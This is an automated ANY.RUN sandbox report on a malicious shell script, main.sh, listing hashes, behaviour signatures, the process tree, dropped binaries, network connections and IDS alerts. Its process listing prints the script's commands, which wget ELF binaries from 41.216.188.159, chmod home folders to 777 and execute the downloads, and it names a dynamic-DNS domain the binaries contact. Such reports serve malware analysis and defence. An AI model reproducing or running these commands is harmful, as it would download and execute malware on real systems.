File name:

main.sh

Full analysis: https://app.any.run/tasks/cb2a0fb4-c60d-4740-99c5-c5a888d45bb7
Verdict: Malicious activity
Analysis date: June 21, 2025, 21:40:27
OS: Ubuntu 22.04.2
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

041FD7CD861D6AD38485C1E783EC10B3

SHA1:

2BE77942D3CB68D4B2116D5E29AD4AE446019F98

SHA256:

EE58E06CE6F1DF21CE9A75D8601F0027F32585340978ED1E4DCE1C4746ECC468

SSDEEP:

12:EkJJMcdkqyEkJJMcdT1qy/akJJMcCqzkJJMca6qoahkJJMcYqx:7JJbREJJbimhJJbVgJJb8TuJJbbx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • main_x86 (deleted) (PID: 41406)
      • main_x86 (deleted) (PID: 41408)
      • main_x86 (PID: 41405)
      • main_x86_64 (deleted) (PID: 41413)
      • main_x86_64 (PID: 41412)
      • main_x86_64 (deleted) (PID: 41414)

  • SUSPICIOUS

    • Modifies file or directory owner

      • sudo (PID: 41397)

    • Starts itself from another location

      • main_x86_64 (PID: 41412)
      • main_x86 (PID: 41405)

    • Executes the "rm" command to delete files or directories

      • bash (PID: 41401)

    • Executes commands using command-line interpreter

      • sudo (PID: 41400)
      • bash (PID: 41401)

    • Uses wget to download content

      • bash (PID: 41401)

    • Potential Corporate Privacy Violation

      • wget (PID: 41403)
      • wget (PID: 41417)
      • wget (PID: 41424)
      • wget (PID: 41410)
      • wget (PID: 41431)

    • Connects to SSH

      • main_x86 (deleted) (PID: 41406)
      • main_x86_64 (deleted) (PID: 41413)

  • INFO

    • Checks timezone

      • wget (PID: 41403)
      • wget (PID: 41417)
      • wget (PID: 41410)
      • wget (PID: 41424)
      • wget (PID: 41431)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
165
Monitored processes
35
Malicious processes
1
Suspicious processes
6

Behavior graph

Click at the process to see the details
dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs wget chmod no specs main_x86 no specs rm no specs main_x86 (deleted) main_x86 (deleted) no specs bash no specs wget chmod no specs main_x86_64 no specs rm no specs main_x86_64 (deleted) bash no specs main_x86_64 (deleted) no specs wget chmod no specs bash no specs rm no specs bash no specs wget chmod no specs bash no specs rm no specs bash no specs wget chmod no specs bash no specs rm no specs

Process information

PID
CMD
Path
Indicators
Parent process
41396/bin/sh -c "sudo chown user /home/user/Desktop/main\.sh && chmod +x /home/user/Desktop/main\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/main\.sh "/usr/bin/dashUbvyYXL4x2mYa65Q
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41397sudo chown user /home/user/Desktop/main.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41398chown user /home/user/Desktop/main.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41399chmod +x /home/user/Desktop/main.sh/usr/bin/chmoddash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41400sudo -iu user /home/user/Desktop/main.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41401-bash --login -c \/home\/user\/Desktop\/main\.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
41402/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41403wget http://41.216.188.159/main_x86/usr/bin/wget
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
/usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
/usr/lib/x86_64-linux-gnu/libssl.so.3
/usr/lib/x86_64-linux-gnu/libcrypto.so.3
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
/usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0
41404chmod 777 Desktop Documents Downloads main_x86 Music Pictures Public snap Templates test_files Videos/usr/bin/chmodbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41405./main_x86/home/user/main_x86bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Executable files
0
Suspicious files
5
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
41403wget/home/user/main_x86binary
MD5:
SHA256:
41410wget/home/user/main_x86_64binary
MD5:
SHA256:
41417wget/home/user/main_arm (deleted)binary
MD5:
SHA256:
41424wget/home/user/main_arm7binary
MD5:
SHA256:
41431wget/home/user/main_m68k (deleted)binary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
17
TCP/UDP connections
22
DNS requests
55
Threats
60

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
207.211.211.27:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
POST
185.125.188.54:443
https://api.snapcraft.io/v2/snaps/refresh
unknown
whitelisted
POST
200
185.125.188.57:443
https://api.snapcraft.io/v2/snaps/refresh
unknown
binary
45.5 Kb
whitelisted
POST
200
185.125.188.57:443
https://api.snapcraft.io/api/v1/snaps/auth/nonces
unknown
binary
54 b
whitelisted
POST
200
185.125.188.58:443
https://api.snapcraft.io/api/v1/snaps/auth/sessions
unknown
whitelisted
POST
200
185.125.188.59:443
https://api.snapcraft.io/v2/snaps/refresh
unknown
binary
45.4 Kb
whitelisted
GET
200
185.125.188.58:443
https://api.snapcraft.io/v2/snaps/info/curl?architecture=amd64&fields=architectures%2Cbase%2Cconfinement%2Clinks%2Ccontact%2Ccreated-at%2Cdescription%2Cdownload%2Cepoch%2Clicense%2Cname%2Cprices%2Cprivate%2Cpublisher%2Crevision%2Csnap-id%2Csummary%2Ctitle%2Ctype%2Cversion%2Cwebsite%2Cstore-url%2Cmedia%2Ccommon-ids%2Ccategories
unknown
GET
185.125.190.97:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
204
185.125.190.97:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
204
185.125.190.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
185.125.190.98:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
185.125.190.97:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
484
avahi-daemon
224.0.0.251:5353
unknown
185.125.190.48:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
207.211.211.27:443
odrs.gnome.org
US
whitelisted
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
41403
wget
41.216.188.159:80
Private-Hosting di Cipriano oscar
DE
unknown
41410
wget
41.216.188.159:80
Private-Hosting di Cipriano oscar
DE
unknown
41417
wget
41.216.188.159:80
Private-Hosting di Cipriano oscar
DE
unknown

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::23
  • 2620:2d:4002:1::197
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::97
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::2b
  • 2001:67c:1562::23
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::96
  • 2001:67c:1562::24
  • 185.125.190.48
  • 185.125.190.97
  • 185.125.190.17
  • 91.189.91.48
  • 91.189.91.97
  • 91.189.91.98
  • 91.189.91.96
  • 91.189.91.49
  • 185.125.190.98
  • 185.125.190.18
  • 185.125.190.49
  • 185.125.190.96
whitelisted
odrs.gnome.org
  • 207.211.211.27
  • 195.181.170.19
  • 195.181.175.40
  • 169.150.255.184
  • 169.150.255.180
  • 212.102.56.179
  • 37.19.194.80
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::18
whitelisted
api.snapcraft.io
  • 185.125.188.59
  • 185.125.188.54
  • 185.125.188.58
  • 185.125.188.57
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::2e6
whitelisted
google.com
  • 142.250.186.142
  • 2a00:1450:4001:82a::200e
whitelisted
4.100.168.192.in-addr.arpa
unknown
vagner.sytes.net
unknown

Threats

PID
Process
Class
Message
41403
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41406
main_x86 (deleted)
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
41410
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41413
main_x86_64 (deleted)
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
41417
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41424
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41431
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41406
main_x86 (deleted)
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
41413
main_x86_64 (deleted)
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
41406
main_x86 (deleted)
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
main.sh